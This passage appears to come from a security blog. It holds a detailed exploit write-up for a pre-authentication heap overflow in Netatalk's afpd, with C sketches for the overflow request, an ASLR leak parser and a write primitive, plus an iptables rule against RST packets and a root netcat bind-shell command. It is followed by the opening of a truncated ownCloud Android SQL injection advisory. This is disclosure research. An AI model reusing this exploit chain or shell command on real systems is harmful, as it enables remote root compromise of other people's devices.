            /* ... */
        case DSIFUNC_TICKLE:
            /* ...*/
        case DSIFUNC_CMD:
            /* ... */
            function = (u_char) dsi->commands[0];
            /* ... */
            err = (*afp_switch[function])(obj, dsi->commands, dsi->cmdlen, &dsi->data, &dsi->datalen);
            /* ... */
        default:
            LOG(log_info, logtype_afpd,"afp_dsi: spurious command %d", cmd);
            dsi_writeinit(dsi, dsi->data, DSI_DATASIZ);
            dsi_writeflush(dsi);
            break;
        }

The receiving process

In the previous snippet, we saw that an idling server will receive the client data in 

dsi_stream_receive()
. Because of the buffering attempts this function is a bit cumbersome. Here is an overview of the whole receiving process within 
dsi_stream_receive()
.

dsi_stream_receive(DSI* dsi)
 
  1. define char block[DSI_BLOCKSIZ] in its stack to receive a DSI header
 
  2. dsi_buffered_stream_read(dsi, block, sizeof(block)) wait for a DSI header
    
    1. from_buf(dsi, block, length)
       Tries to fetch available data from already buffered input
       in-between dsi->start and dsi->end
    
    2. recv(dsi->socket, dsi->eof, buflen, 0)
       Tries to receive at most 8192 bytes in a buffering attempt into the look ahead buffer
       The socket is non blocking so the call usually fails
    
    3. dsi_stream_read(dsi, block, len))
      
      1. buf_read(dsi, block, len)
        
        1. from_buf(dsi, block, len)
           Tries again to get data from the buffered input
        
        2. readt(dsi->socket, block, len, 0, 0);
           Receive data on the socket
           This call will wait on a recv()/select() loop and is usually the blocking one

  3. Populate &dsi->header from what has been received

  4. dsi_stream_read(dsi, dsi->commands, dsi->cmdlen)
        
    1. calls buf_read() to fetch the DSI payload
       If not enough data is available, the call wait on select()

The main point to notice here is that the server is only buffering the client data in the 

recv()
 of 
dsi_buffered_stream_read()
 when multiple or large commands are sent as one. Also, never more than 8KB are buffered.

THE VULNERABILITY

As seen in the previous snippets, in the main loop, afp_over_dsi() can receive an unknown command id. In that case the server will call dsi_writeinit(dsi, dsi->data, DSI_DATASIZ) then dsi_writeflush(dsi).

We assume that the purpose of those two functions is to flush both the input and the output buffer, eventually purging the look ahead buffer. However, these functions are really peculiar and calling them here doesn’t seem correct. Worse, dsi_writeinit() has a buffer overflow vulnerability! Indeed, the function will flush out bytes from the look ahead buffer into its second argument dsi->data without checking the size provided in the third argument DSI_DATASIZ.

size_t dsi_writeinit(DSI *dsi, void *buf, const size_t buflen _U_)
{
    size_t bytes = 0;
    dsi->datasize = ntohl(dsi->header.dsi_len) - dsi->header.dsi_data.dsi_doff;

    if (dsi->eof > dsi->start) {
        /* We have data in the buffer */
        bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
        memmove(buf, dsi->start, bytes);    // potential overflow here
        dsi->start += bytes;
        dsi->datasize -= bytes;
        if (dsi->start >= dsi->eof)
            dsi->start = dsi->eof = dsi->buffer;
    }

    LOG(log_maxdebug, logtype_dsi, "dsi_writeinit: remaining DSI datasize: %jd", (intmax_t)dsi->datasize);

    return bytes;
}

In the above code snippet, both variables dsi->header.dsi_len and dsi->header.dsi_data.dsi_doff were set up in dsi_stream_receive() and are controlled by the client. So dsi->datasize is client controlled and, depending on MIN(dsi->eof - dsi->start, dsi->datasize), the following memmove could in theory overflow buf (here dsi->data). This may lead to a corruption of the tail of the dsi struct as dsi->data is an inlined buffer.

However, there is an important limitation: dsi->data has a size of 64KB and we have seen that the implementation of the look ahead buffer will at most read 8KB of data in dsi_buffered_stream_read(). So in most cases dsi->eof - dsi->start is less than 8KB, and that is not enough to overflow dsi->data.

Fortunately, there is still a complex way to buffer more than 8KB of data and to trigger this overflow. The next parts explain how to reach that point and exploit this vulnerability to achieve code execution.

Exploitation

TRIGGERING THE VULNERABILITY

Finding a way to push data in the look ahead buffer

 

The curious case of dsi_peek()

While the receiving process is not straightforward, the sending one is even more confusing. There are a lot of different functions involved to send back data to the client and an interesting one is 

dsi_peek(DSI *dsi)
.

Here is the function documentation:

/*
 * afpd is sleeping too much while trying to send something.
 * May be there's no reader or the reader is also sleeping in write,
 * look if there's some data for us to read, hopefully it will wake up
 * the reader so we can write again.
 *
 * @returns 0 when is possible to send again, -1 on error
 */
 static int dsi_peek(DSI *dsi)

In other words, 

dsi_peek()
 will take a pause during a blocked send and might try to read something if possible. This is done in an attempt to avoid potential deadlocks between the client and the server. The good thing is that the reception is buffered:

static int dsi_peek(DSI *dsi)
{
    /* ... */

    while (1) {
        /* ... */
        FD_ZERO(&readfds);
        FD_ZERO(&writefds);

        if (dsi->eof < dsi->end) {
            /* space in read buffer */
            FD_SET( dsi->socket, &readfds);
        } else { /* ... */ }

        FD_SET( dsi->socket, &writefds);

        /* No timeout: if there's nothing to read nor nothing to write,
         * we've got nothing to do at all */
        if ((ret = select( maxfd, &readfds, &writefds, NULL, NULL)) <= 0) {
            if (ret == -1 && errno == EINTR)
                /* we might have been interrupted by out timer, so restart select */
                continue;
            /* give up */
            LOG(log_error, logtype_dsi, "dsi_peek: unexpected select return: %d %s",
                ret, ret < 0 ? strerror(errno) : "");
            return -1;
        }

        if (FD_ISSET(dsi->socket, &writefds)) {
            /* we can write again */
            LOG(log_debug, logtype_dsi, "dsi_peek: can write again");
            break;
        }

        /* Check if there's sth to read, hopefully reading that will unblock the client */
        if (FD_ISSET(dsi->socket, &readfds)) {
            len = dsi->end - dsi->eof; /* it's ensured above that there's space */

            if ((len = recv(dsi->socket, dsi->eof, len, 0)) <= 0) {
                if (len == 0) {
                    LOG(log_error, logtype_dsi, "dsi_peek: EOF");
                    return -1;
                }
                LOG(log_error, logtype_dsi, "dsi_peek: read: %s", strerror(errno));
                if (errno == EAGAIN)
                    continue;
                return -1;
            }
            LOG(log_debug, logtype_dsi, "dsi_peek: read %d bytes", len);

            dsi->eof += len;
        }
    }

Here we see that if the select() returns with dsi->socket set as readable and not writable, recv() is called with dsi->eof. This looks like a way to push more than 64KB of data into the look ahead buffer to later trigger the vulnerability.

One question remains: how to reach dsi_peek()?

 

Reaching dsi_peek()

While there are multiple ways to get into that function, we focused on the 

dsi_cmdreply()
 call path. This function is used to reply to a client request, which is done with most AFP commands. For instance sending a request with 
DSIFUNC_CMD
 and the AFP command 
0x14
 will trigger a logout attempt, even for an unauthenticated client, and reach the following call stack:

afp_over_dsi()
dsi_cmdreply(dsi, err)
dsi_stream_send(dsi, dsi->data, dsi->datalen);
dsi_stream_write(dsi, block, sizeof(block), 0)

From there the following code is executed:

ssize_t dsi_stream_write(DSI *dsi, void *data, const size_t length, int mode)
{

  /* ... */
  while (written < length) {
      len = send(dsi->socket, (uint8_t *) data + written, length - written, flags);
      if (len >= 0) {
          written += len;
          continue;
      }

      if (errno == EINTR)
          continue;

      if (errno == EAGAIN || errno == EWOULDBLOCK) {
          LOG(log_debug, logtype_dsi, "dsi_stream_write: send: %s", strerror(errno));

          if (mode == DSI_NOWAIT && written == 0) {
              /* DSI_NOWAIT is used by attention give up in this case. */
              written = -1;
              goto exit;
          }

          /* Try to read sth. in order to break up possible deadlock */
          if (dsi_peek(dsi) != 0) {
              written = -1;
              goto exit;
          }
          /* Now try writing again */
          continue;
      }

      /* ... */

In the above code, we see that in order to reach 

dsi_peek()
 the call to 
send()
 has to fail.

 

Summarizing the objectives and the strategy

So to summarize, in order to push data into the look ahead buffer one can:

  1. Send a logout command to reach 
    dsi_cmdreply
    .
  2. In 
    dsi_stream_write
    , find a way to make the 
    send()
     syscall fail.
  3. In 
    dsi_peek()
     find a way to make 
    select()
     only returns a readable socket.

Getting a remote system to fail at sending data, while keeping the stream open, is tricky. One funny way to do that is to mess with the TCP networking layer. The overall strategy is to have a custom TCP stack that will simulate network congestion once a logout request is sent, but only in one direction. The idea is that the remote application will think that it cannot send any more data, while it can still receive some.

Because there are a lot of layers involved (the networking card layer, the kernel buffering, the remote TCP congestion avoidance algorithm, the userland stack (?)) it is non trivial to find the optimal way to achieve the goals. But the chosen approach is a mix between two techniques:

  • Zeroing the TCP window on the client side, letting the remote end think our buffer is full;
  • Not sending ACK packets for the server replies.

This strategy seems effective enough and the exploit manages to enter the wanted codepath within a few seconds.

Writing a custom TCP stack

To achieve the described strategy we needed to re-implement a TCP networking stack. Because we did not want to get into low-level details, we decided to use scapy [6] and implemented it in Python over raw sockets.

The class RawTCP of the exploit is the result of this development. It is basic and slow, and it does not handle most of the specific aspects of TCP (such as packet re-ordering and re-transmission). However, because we expect the targeted device to be on the same network without reliability issues, the current implementation is stable enough.

The most noteworthy details of RawTCP are the attribute reply_with_ack, which can be set to 0 to stop sending ACKs, and window, which is used to advertise the current buffer size.

One prerequisite of our exploit is that the attacker kernel must be «muzzled down» so that it doesn’t try to interpret incoming and unexpected TCP segments.
Indeed, the Linux TCP stack is not aware of our shenanigans on the TCP connection and it will try to kill the connection by sending RST packets.

One can prevent Linux from sending RST packets to the target, with an iptables rule like this:

# iptables -I OUTPUT -p tcp -d TARGET_IP --dport 548 --tcp-flags RST RST -j DROP

Triggering the bug

To sum up, here is how we managed to trigger the bug. The code implementing this is located in the function 

do_overflow
 of the exploit:

  1. Open a session by sending DSIOpenSession.
  2. In bulk, send a lot of DSICommand requests with the logout function 0x14 to force the server into dsi_cmdreply().
    From our tests, 3000 commands seem to be enough for the targeted hardware.
  3. Simulate a congestion by advertising a TCP window size of 0 while no longer ACKing the server replies.
    After a short while the server should be stuck in dsi_peek(), only capable of receiving data.
  4. Send a dummy, invalid DSI command with a dsi_len and a payload larger than 64KB.
    This command is received in dsi_peek() and later consumed in dsi_stream_receive() / dsi_stream_read() / buf_read().
    In the exploit we use the command id DSIFUNC_MAX+1 to enter the default case of the afp_over_dsi() switch.
  5. Send a block of raw data larger than 64KB.
    This block is also received in dsi_peek() while the server is blocked, but is consumed in dsi_writeinit(), overflowing dsi->data and the tail of the dsi struct.
  6. Start acknowledging the server replies (3000) again by sending ACKs back with a proper TCP window size.
    This triggers the handling of the logout commands that were queued up during the obstruction, then of the invalid command, reaching the overflow.

The whole process is done pretty quickly in a few seconds, depending on the setup (usually less than 15s).
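As a small illustration of step 4, here is what the oversized DSI request could look like on the wire, using a flattened copy of the dsi_block header from the sources above (the dsi_code/dsi_doff union collapsed into one field). The command id 9 is an assumption for a value above DSIFUNC_MAX, and in the real exploit the header and the large raw block of step 5 are delivered while the server is stuck in dsi_peek(), not necessarily in one send as here.

/* Sketch: an invalid DSI command whose announced length exceeds the 64KB
 * dsi->data buffer, so that dsi_writeinit() later overflows it. */
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

struct dsi_hdr {
    uint8_t  dsi_flags;      /* 0x00 = request                    */
    uint8_t  dsi_command;    /* invalid id -> default switch case */
    uint16_t dsi_requestID;
    uint32_t dsi_doff;       /* datasize = dsi_len - dsi_doff     */
    uint32_t dsi_len;
    uint32_t dsi_reserved;
};

size_t build_overflow_request(uint8_t *out, uint32_t payload_len /* > 0x10000 */)
{
    struct dsi_hdr hdr;
    memset(&hdr, 0, sizeof(hdr));
    hdr.dsi_flags     = 0x00;
    hdr.dsi_command   = 9;                 /* assumed to be above DSIFUNC_MAX */
    hdr.dsi_requestID = htons(0x1337);
    hdr.dsi_doff      = htonl(0);
    hdr.dsi_len       = htonl(payload_len);

    memcpy(out, &hdr, sizeof(hdr));
    memset(out + sizeof(hdr), 'A', payload_len);  /* raw block of step 5 */
    return sizeof(hdr) + payload_len;
}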

GETTING A LEAK

To exploit the server, we need to know where the main binary (afpd) is loaded in memory. The server runs with Address Space Layout Randomization (ASLR) enabled, therefore the base address of afpd changes each time the server gets started. Fortunately for us, afpd forks before handling a client connection, so the base address will remain the same across all connections even if we crash a forked process.

In order to defeat ASLR, we need to leak a pointer to some known memory location in the afpd binary. To obtain this leak, we can use the overflow to corrupt the tail of the 

dsi
 struct (after the data buffer) to force the server to send us more data than expected. The command replay cache feature of the server provides a convenient way to do so.

Here is the relevant part of the main loop of 

afp_over_dsi()
:

// in afp_over_dsi()
    case DSIFUNC_CMD:

        function = (u_char) dsi->commands[0];

        /* AFP replay cache */
        rc_idx = dsi->clientID % REPLAYCACHE_SIZE;
        LOG(log_debug, logtype_dsi, "DSI request ID: %u", dsi->clientID);

        if (replaycache[rc_idx].DSIreqID == dsi->clientID
            && replaycache[rc_idx].AFPcommand == function) {

            LOG(log_note, logtype_afpd, "AFP Replay Cache match: id: %u / cmd: %s",
                dsi->clientID, AfpNum2name(function));
            err = replaycache[rc_idx].result;

            /* AFP replay cache end */

        } else {
                dsi->datalen = DSI_DATASIZ;
                dsi->flags |= DSI_RUNNING;
            /* ... */

            if (afp_switch[function]) {
                /* ... */
                err = (*afp_switch[function])(obj,
                                              (char *)dsi->commands, dsi->cmdlen,
                                              (char *)&dsi->data, &dsi->datalen);

                /* ... */
                /* Add result to the AFP replay cache */
                replaycache[rc_idx].DSIreqID = dsi->clientID;
                replaycache[rc_idx].AFPcommand = function;
                replaycache[rc_idx].result = err;
            }
        }
        /* ... */
        dsi_cmdreply(dsi, err)

        /* ... */

Here is the code for 

dsi_cmdreply()
:

int dsi_cmdreply(DSI *dsi, const int err)
{
    int ret;

    LOG(log_debug, logtype_dsi, "dsi_cmdreply(DSI ID: %u, len: %zd): START",
        dsi->clientID, dsi->datalen);

    dsi->header.dsi_flags = DSIFL_REPLY;
    dsi->header.dsi_len = htonl(dsi->datalen);
    dsi->header.dsi_data.dsi_code = htonl(err);

    ret = dsi_stream_send(dsi, dsi->data, dsi->datalen);

    LOG(log_debug, logtype_dsi, "dsi_cmdreply(DSI ID: %u, len: %zd): END",
        dsi->clientID, dsi->datalen);

    return ret;
}

When the server receives the same command twice (same clientID and function), it takes the replay cache code path which calls dsi_cmdreply() without initializing dsi->datalen. So in that case, dsi_cmdreply() will send dsi->datalen bytes of dsi->data back to the client in dsi_stream_send().

This is fortunate because the 

datalen
 field is located just after the data buffer in the struct DSI. That means that to control 
datalen
 we just need to trigger the overflow with 65536 + 4 bytes (4 being the size of a size_t).

Then, by sending a DSICommand command with an already used clientID, we reach a dsi_cmdreply() that can send back all the dsi->data buffer, the tail of the dsi struct and part of the following heap data. In the dsi struct tail, we get some heap pointers such as dsi->buffer, dsi->start, dsi->eof and dsi->end. This is useful because we now know where client controlled data is stored.
In the following heap data, we hopefully expect to find pointers into the afpd main image.

From our experiments we found out that most of the time, by requesting a leak of 2MB+64KB we get parts of the heap where 

hash_t
 objects were allocated by 
hash_create()
:

typedef struct hash_t {
    #if defined(HASH_IMPLEMENTATION) || !defined(KAZLIB_OPAQUE_DEBUG)
    struct hnode_t **hash_table;        /* 1 */
    hashcount_t hash_nchains;           /* 2 */
    hashcount_t hash_nodecount;         /* 3 */
    hashcount_t hash_maxcount;          /* 4 */
    hashcount_t hash_highmark;          /* 5 */
    hashcount_t hash_lowmark;           /* 6 */
    hash_comp_t hash_compare;           /* 7 */
    hash_fun_t hash_function;           /* 8 */
    hnode_alloc_t hash_allocnode;
    hnode_free_t hash_freenode;
    void *hash_context;
    hash_val_t hash_mask;           /* 9 */
    int hash_dynamic;               /* 10 */
    #else
    int hash_dummy;
    #endif
} hash_t;

hash_t *hash_create(hashcount_t maxcount, hash_comp_t compfun,
                    hash_fun_t hashfun)
{
    hash_t *hash;

    if (hash_val_t_bit == 0)    /* 1 */
        compute_bits();

    hash = malloc(sizeof *hash);    /* 2 */

    if (hash) {     /* 3 */
        hash->table = malloc(sizeof *hash->table * INIT_SIZE);  /* 4 */
        if (hash->table) {  /* 5 */
            hash->nchains = INIT_SIZE;      /* 6 */
            hash->highmark = INIT_SIZE * 2;
            hash->lowmark = INIT_SIZE / 2;
            hash->nodecount = 0;
            hash->maxcount = maxcount;
            hash->compare = compfun ? compfun : hash_comp_default;
            hash->function = hashfun ? hashfun : hash_fun_default;
            hash->allocnode = hnode_alloc;
            hash->freenode = hnode_free;
            hash->context = NULL;
            hash->mask = INIT_MASK;
            hash->dynamic = 1;          /* 7 */
            clear_table(hash);          /* 8 */
            assert (hash_verify(hash));
            return hash;
        }
        free(hash);
    }
    return NULL;
}

The hash_t structure is very distinct from other data and contains pointers to the hnode_alloc() and hnode_free() functions that are located in the afpd main image.
Therefore, by parsing the received leak, we can look for hash_t patterns and recover the ASLR slide of the main binary. This method is implemented in the exploit in the function parse_leak().
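A sketch of that scanning logic is shown below. It assumes a 32-bit afpd (pointers and size_t are 4 bytes on this target), a freshly created hash_t whose nchains and highmark still hold their hash_create() initialization values, and a made-up static offset for hnode_alloc(); in the real exploit those constants come from the target firmware's binary.

/* Sketch of the parse_leak() idea: find a hash_t in the leaked heap bytes and
 * derive the afpd base from its hnode_alloc pointer. Constants are assumptions. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define ASSUMED_INIT_SIZE          16        /* hash_create() INIT_SIZE guess  */
#define ASSUMED_HNODE_ALLOC_OFFSET 0x54321   /* static offset of hnode_alloc() */

struct leaked_hash_t {               /* 32-bit layout of struct hash_t */
    uint32_t hash_table;
    uint32_t hash_nchains;
    uint32_t hash_nodecount;
    uint32_t hash_maxcount;
    uint32_t hash_highmark;
    uint32_t hash_lowmark;
    uint32_t hash_compare;
    uint32_t hash_function;
    uint32_t hash_allocnode;
    uint32_t hash_freenode;
};

uint32_t find_afpd_base(const uint8_t *leak, size_t len)
{
    for (size_t off = 0; off + sizeof(struct leaked_hash_t) <= len; off += 4) {
        struct leaked_hash_t h;
        memcpy(&h, leak + off, sizeof(h));
        /* A fresh hash_t keeps nchains == INIT_SIZE and highmark == 2*INIT_SIZE,
         * which is a distinctive enough pattern to spot in the leak. */
        if (h.hash_nchains == ASSUMED_INIT_SIZE &&
            h.hash_highmark == 2 * ASSUMED_INIT_SIZE &&
            h.hash_allocnode != 0 && h.hash_freenode != 0)
            return h.hash_allocnode - ASSUMED_HNODE_ALLOC_OFFSET;
    }
    return 0;   /* pattern not found */
}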

Regrettably, this strategy is not 100% reliable, depending on the heap initialization of afpd.
There might be non-mapped memory ranges after the dsi struct, crashing the daemon while trying to send the leak.
In that case, the exploit won't work until the device (or daemon) gets restarted.
Fortunately, this situation seems rare (less than 20% of the cases), giving the exploit a fair chance of success.

BUILDING A WRITE PRIMITIVE

Now that we know where the main image and heap are located in the server memory, it is possible to use the full potential of the vulnerability and overflow the rest of the DSI struct to reach code execution.

Rewriting dsi->proto_close looks like a promising way to get control of the flow. However, because of the lack of control on the arguments, we’ve chosen another exploitation method that works equally well on all architectures but requires the ability to write arbitrary data at a chosen location.


The look ahead pointers of the 

DSI
 structure seem like a nice opportunity to achieve a controlled write.

typedef struct DSI {
    /* ... */
    uint8_t  data[DSI_DATASIZ];
    size_t   datalen, cmdlen; /* begining of the overflow */
    off_t    read_count, write_count;
    uint32_t flags;             /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
    int      socket;            /* AFP session socket */
    int      serversock;        /* listening socket */

    /* DSI readahead buffer used for buffered reads in dsi_peek */
    size_t   dsireadbuf;        /* size of the DSI readahead buffer used in dsi_peek() */
    char     *buffer;           /* buffer start */
    char     *start;            /* current buffer head */
    char     *eof;              /* end of currently used buffer */
    char     *end;

    /* ... */
} DSI;

By setting dsi->buffer to the location we want to write and dsi->end as the upper bound of the writing location, the next command buffered by the server can end up at a controlled address.

One should take care while setting dsi->start and dsi->eof, because they are reset to dsi->buffer after the overflow in dsi_writeinit():

    if (dsi->eof > dsi->start) {
        /* We have data in the buffer */
        bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
        memmove(buf, dsi->start, bytes);
        dsi->start += bytes;         // the overflowed value is changed back here ...
        dsi->datasize -= bytes;
        if (dsi->start >= dsi->eof)
            dsi->start = dsi->eof = dsi->buffer; // ... and there
    }

As seen in the snippet, this is only a matter of setting dsi->start greater than dsi->eof during the overflow.

So to get a write primitive one should:

  1. Overflow dsi->buffer, dsi->end, dsi->start and dsi->eof according to the write location.
  2. Send two commands in the same TCP segment.

The first command is just a dummy one, and the second command contains the data to write.

Sending two commands here seems odd, but it is necessary to trigger the arbitrary write, because of the convoluted reception mechanism of dsi_stream_read().

When receiving the first command, 

dsi_buffered_stream_read()
 will skip the non-blocking call to 
recv()
 and take the blocking receive path in 
dsi_stream_read()
 -> 
buf_read()
 -> 
readt()
.

The controlled write happens during the reception of the second command. Because the two commands were sent in the same TCP segment, the data of the second one is most likely to be available on the socket. Therefore the non-blocking recv() should succeed and write at dsi->eof.
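
Putting the constraints together, the tail of the struct overwritten during the overflow could be laid out as in the sketch below (a 32-bit view of the fields following data[], mirroring the struct shown earlier; the preserved fields are copied from the values leaked in the previous step, and treating off_t as 32-bit here is an assumption):

/* Sketch of the dsi tail as rewritten for the arbitrary write: buffer/end
 * bracket the destination, and start > eof so both are reset to buffer. */
#include <stdint.h>

struct dsi_tail {                       /* fields following data[DSI_DATASIZ] */
    uint32_t datalen, cmdlen;
    uint32_t read_count, write_count;   /* off_t, assumed 32-bit here */
    uint32_t flags;
    int32_t  socket, serversock;
    uint32_t dsireadbuf;
    uint32_t buffer;                    /* where the next buffered recv() lands */
    uint32_t start;
    uint32_t eof;
    uint32_t end;
};

void build_write_tail(struct dsi_tail *t, const struct dsi_tail *leaked,
                      uint32_t where, uint32_t size)
{
    *t = *leaked;             /* keep socket and friends intact             */
    t->buffer = where;        /* write destination                          */
    t->end    = where + size; /* upper bound used by dsi_peek()             */
    t->start  = where + 1;    /* start > eof ...                            */
    t->eof    = where;        /* ... so both get reset to buffer afterwards */
}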

COMMAND EXECUTION

With the ability to write arbitrary data at a chosen location it is now possible to take control of the remote program.

The most obvious location to write to is the array 

preauth_switch
:

static AFPCmd preauth_switch[] = {
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*   0 -   7 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*   8 -  15 */
    NULL, NULL, afp_login, afp_logincont,
    afp_logout, NULL, NULL, NULL,               /*  16 -  23 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*  24 -  31 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*  32 -  39 */
    NULL, NULL, NULL, NULL,
    ...

As seen previously, this array is used in 

afp_over_dsi()
 to dispatch the client 
DSICommand
 requests. By writing an arbitrary entry in the table, it is then possible to perform the following call with a controlled function pointer:

err = (*afp_switch[function])(obj,
                (char *)dsi->commands, dsi->cmdlen,
                (char *)&dsi->data, &dsi->datalen);

One excellent candidate to replace 

preauth_switch[function]
 with is 
afprun()
. This function is used by the server to launch a shell command, and can even do so with root privileges 🙂

int afprun(int root, char *cmd, int *outfd)
{
    pid_t pid;
    uid_t uid = geteuid();
    gid_t gid = getegid();

    /* point our stdout at the file we want output to go into */
    if (outfd && ((*outfd = setup_out_fd()) == -1)) {
        return -1;
    }

    /* ... */

    if ((pid=fork()) < 0) { /* ... */ }

    /* ... */

    /* now completely lose our privileges. This is a fairly paranoid
       way of doing it, but it does work on all systems that I know of */
    if (root) {
        become_user_permanently(0, 0);
        uid = gid = 0;
    }
    else {
        become_user_permanently(uid, gid);
    }

    /* ... */

    execl("/bin/sh","sh","-c",cmd,NULL);
    /* not reached */
    exit(82);
    return 1;
}

So to get a command executed as root, we transform the call:

(*afp_switch[function])(obj, dsi->commands, dsi->cmdlen, [...]);

into

afprun(int root, char *cmd, int *outfd)

The situation is the following:

  • function is chosen by the client so that afp_switch[function] is the function pointer overwritten with afprun;
  • obj is a non-NULL AFPObj* pointer, which fits with the root argument that should be non-zero;
  • dsi->commands is a valid pointer with controllable content, where we can put a chosen command such as a bound netcat shell;
  • dsi->cmdlen must either be NULL or a valid pointer because *outfd is dereferenced in afprun.

Here is one final difficulty. It is not possible to send a dsi->command long enough so that dsi->cmdlen becomes a valid pointer.
But with a NULL dsi->cmdlen, dsi->command is not controlled anymore.

The trick is to observe that dsi_stream_receive() does not clean the dsi->command in between client requests, and afp_over_dsi() does not check cmdlen before using dsi->commands[0].

So if a client sends a DSI packet without a dsi->command payload and a dsi->cmdlen of zero, the dsi->command remains the same as the previous command.

As a result it is possible to send:

  • A first DSI request with dsi->command being something similar to <function_id> ; /sbin/busybox nc -lp <PORT> -e /bin/sh;.
  • A second DSI request with a zero dsi->cmdlen.

This ends up calling:

(*afp_switch[function_id])(obj,"<function_id> ; /sbin/busybox nc -lp <PORT> -e /bin/sh;", 0, [...])

which is what was required to get RCE once afp_switch[function_id] was overwritten with afprun.


As a final optimization, it is even possible to send the last two DSI packets triggering code execution as the last two commands required for the write primitive.
This results in doing the preauth_switch overwrite and the dsi->command / dsi->cmdlen setup at the same time.
As a matter of fact, it is even easier to mix both because of a detail that is not worth explaining in this write-up.
The interested reader can refer to the exploit comments.

PUTTING THINGS TOGETHER

To sum up here is an overview of the exploitation process:

  1. Setting up the connection.
  2. Triggering the vulnerability with a 4-byte overflow to rewrite dsi->datalen.
  3. Sending a command with a previously used clientID to trigger the leak.
  4. Parsing the leak while looking for hash_t structs, giving pointers to the afpd main image.
  5. Closing the old connection and setting up a new connection.
  6. Triggering the vulnerability with a larger overflow to rewrite the look ahead buffer pointers of the dsi struct.
  7. Sending both requests as one:
    1. A first DSICommand with the content "<function_id> ; /sbin/busybox nc -lp <PORT> -e /bin/sh;";
    2. A second DSICommand with the content &afprun, but with a zero length dsi_len and dsi->cmdlen.
  8. Sending a DSICommand without content to trigger the command execution.

CONCLUSION

During this research we developed a working exploit for the latest version of Netatalk. It uses a single heap overflow vulnerability to bypass all mitigations and obtain command execution as root. On the MyCloud Home the afpd service was configured to allow guest authentication, but since the bug was accessible prior to authentication, the exploit works even if guest authentication is disabled.

The funkiest part was undoubtedly implementing a custom TCP stack to trigger the bug. This is quite uncommon for a userland, real-life (as in, not a CTF) exploit, and we hope that it was entertaining for the reader.

Our exploit will be published on GitHub after a short delay. It should work as-is on the targeted device. Adapting it to other distributions should require some minor tweaks and is left as an exercise.

Unfortunately, our Pwn2Own entry ended up being a duplicate of the Mofoffensive team's, who targeted another device that shipped an older version of Netatalk. In this previous release the vulnerability was in essence already there, but maybe a little less fun to exploit as it did not require messing with the network stack.

We would like to thank:

  • ZDI and Western Digital for their organization of the P2O competition, especially this session considering the number of teams, and for their help setting up an environment for our exploit;
  • The Netatalk team for the considerable amount of work and effort they put into this Open Source project.

TIMELINE

  • 2022-06-03 — Vulnerability reported to vendor
  • 2023-02-06 — Coordinated public release of advisory

GHSL-2022-059_GHSL-2022-060: SQL injection vulnerabilities in Owncloud Android app — CVE-2023-24804, CVE-2023-23948

GHSL-2022-059_GHSL-2022-060: SQL injection vulnerabilities in Owncloud Android app - CVE-2023-24804, CVE-2023-23948

Original text by GitHub Security Lab

Coordinated Disclosure Timeline

  • 2022-07-26: Issues notified to ownCloud through HackerOne.
  • 2022-08-01: Report receipt acknowledged.
  • 2022-09-07: We request a status update for GHSL-2022-059.
  • 2022-09-08: ownCloud says that they are still working on the fix for GHSL-2022-059.
  • 2022-10-26: We request a status update for GHSL-2022-060.
  • 2022-10-27: ownCloud says that they are still working on the fix for GHSL-2022-060.
  • 2022-11-28: We request another status update for GHSL-2022-059.
  • 2022-11-28: ownCloud says that the fix for GHSL-2022-059 will be published in the next release.
  • 2022-12-12: Version 3.0 is published.
  • 2022-12-20: We verify that version 3.0 fixed GHSL-2022-060.
  • 2022-12-20: We verify that the fix for GHSL-2022-059 was not included in the release. We ask ownCloud about it.
  • 2023-01-31: ownCloud informs us that in 3.0 the filelist database was deprecated (empty, only used for migrations from older versions) and planned to be removed in a future version.
  • 2023-01-31: We answer that, while that would mitigate one of the reported injections, the other one affects the 
    owncloud_database
     database, which remains relevant.
  • 2023-02-02: Publishing advisories as per our disclosure policy.

Summary

The Owncloud Android app uses content providers to manage its data. The provider 

FileContentProvider
 has SQL injection vulnerabilities that allow malicious applications or users in the same device to obtain internal information of the app.

The app also handles externally-provided files in the activity 

ReceiveExternalFilesActivity
, where potentially malicious file paths are not properly sanitized, allowing attackers to read from and write to the application’s internal storage.

Product

Owncloud Android app

Tested Version

v2.21.1

Details

Issue 1: SQL injection in 
FileContentProvider.kt
 (
GHSL-2022-059
)

The 

FileContentProvider
 provider is exported, as can be seen in the Android Manifest:

<provider
    android:name=".providers.FileContentProvider"
    android:authorities="@string/authority"
    android:enabled="true"
    android:exported="true"
    android:label="@string/sync_string_files"
    android:syncable="true" />

All tables in this content provider can be freely interacted with by other apps on the same device. By reviewing the entry-points of the content provider for those tables, it can be seen that several user-controlled parameters end up reaching an unsafe SQL method that allows for SQL injection.

The 
delete
 method

User input enters the content provider through the three parameters of this method:

override fun delete(uri: Uri, where: String?, whereArgs: Array<String>?): Int {

The 

where
 parameter reaches the following dangerous arguments without sanitization:

private fun delete(db: SQLiteDatabase, uri: Uri, where: String?, whereArgs: Array<String>?): Int {
    // --snip--
    when (uriMatcher.match(uri)) {
        SINGLE_FILE -> {
            // --snip--
            count = db.delete(
                ProviderTableMeta.FILE_TABLE_NAME,
                ProviderTableMeta._ID +
                        "=" +
                        uri.pathSegments[1] +
                        if (!TextUtils.isEmpty(where))
                            " AND ($where)" // injection
                        else
                            "", whereArgs
            )
        }
        DIRECTORY -> {
            // --snip--
            count += db.delete(
                ProviderTableMeta.FILE_TABLE_NAME,
                ProviderTableMeta._ID + "=" +
                        uri.pathSegments[1] +
                        if (!TextUtils.isEmpty(where))
                            " AND ($where)" // injection
                        else
                            "", whereArgs
            )
        }
        ROOT_DIRECTORY ->
            count = db.delete(ProviderTableMeta.FILE_TABLE_NAME, where, whereArgs) // injection
        SHARES -> count =
            OwncloudDatabase.getDatabase(MainApp.appContext).shareDao().deleteShare(uri.pathSegments[1])
        CAPABILITIES -> count = db.delete(ProviderTableMeta.CAPABILITIES_TABLE_NAME, where, whereArgs) // injection
        UPLOADS -> count = db.delete(ProviderTableMeta.UPLOADS_TABLE_NAME, where, whereArgs) // injection
        CAMERA_UPLOADS_SYNC -> count = db.delete(ProviderTableMeta.CAMERA_UPLOADS_SYNC_TABLE_NAME, where, whereArgs) // injection
